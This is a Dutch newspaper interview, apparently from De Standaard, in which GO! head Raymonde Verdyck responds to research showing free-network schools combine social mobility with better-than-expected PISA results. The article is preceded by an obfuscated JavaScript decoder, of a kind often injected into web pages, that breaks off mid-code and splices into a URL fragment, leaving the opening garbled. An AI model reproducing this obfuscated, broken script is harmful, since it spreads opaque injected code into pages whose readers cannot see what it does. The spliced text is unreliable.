function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20180903_03700121">

Scholen van het vrij onderwijs slagen er beter in hun leerlingen te laten ­excelleren en hun sociale ­mobiliteit te bevorderen. ‘Ik kan alleen maar zeggen dat ik verrast ben’, reageert Raymonde Verdyck, topvrouw van het GO!.

Scholen van het vrij onderwijs slagen er beter in hun leerlingen te laten ­excelleren en hun sociale ­mobiliteit te bevorderen. Dat blijkt uit onderzoek van Kristof De Witte (KU Leuven) en Jean Hindriks (UCL), op basis van de Pisa-resultaten van de Oeso. Voor Vlaanderen zien de onderzoekers dat 38 procent van de vrije scholen erin slaagt een hogere sociale mobiliteit te combineren met schoolse prestaties die beter zijn dan verwacht. In het ­officiële net lukt dat voor 12 procent van de scholen.

Had u deze resultaten verwacht?

‘Ik kan alleen maar zeggen dat ik verrast ben. Deze onderzoekers beschikken blijkbaar over vergelijkende gegevens, terwijl we de resultaten voor ons eigen net zelfs niet krijgen, ook al zijn we hiervoor vragende partij. Dat we beter scoren op sociale mobiliteit zegt immers iets over de prestaties van onze leerlingen.’

‘Het marktaandeel van het GO! klimt al jaren: ons aantal leerlingen stijgt sneller dan het aantal geboorten, dit heeft een duidelijke link met onze inzet op kwaliteit. Ik zal nooit tegenspreken dat er werk aan de winkel is, maar we scoren volgens de onderzoekers nog steeds beter op sociale mobiliteit als er binnen het eigen net gekeken wordt (dus zonder de schoolse prestaties mee te rekenen, red.).’

De onderzoekers stellen dat het gemeenschapsonderwijs een ander leerlingenprofiel zou aantrekken.

‘Dat klopt. We zien dat bij het GO! het aantal leerlingen met bepaalde SES-indicatoren ­(over ­hun sociaal-economische achtergrond, zoals opleidings­niveau en inkomen van de ouders, red.) hoog is. Maar het is bewezen dat gelijke kansen en ­excellentie elkaar niet uitsluiten. Als we willen excelleren, moeten we iedereen kansen geven. Het behoort tot onze missie om, ongeacht de achtergrond, voor alle leerlingen de hoogste leerwinst te realiseren.’

Dirk Van Damme, hoofd ­onderwijsdivisie van de Oeso, pleitte nochtans voor een beter kwaliteitsbeleid in het gemeenschapsonderwijs.

‘Kwaliteit is al veel langer dan vandaag een continu aandachtspunt bij ons. Dat vertaalt zich in onze driejaarlijkse begeleidingsplannen. We nemen de resultaten van het onderzoek daarbij ter harte. Zo behoren taal en ­lezen tot onze speerpunten.’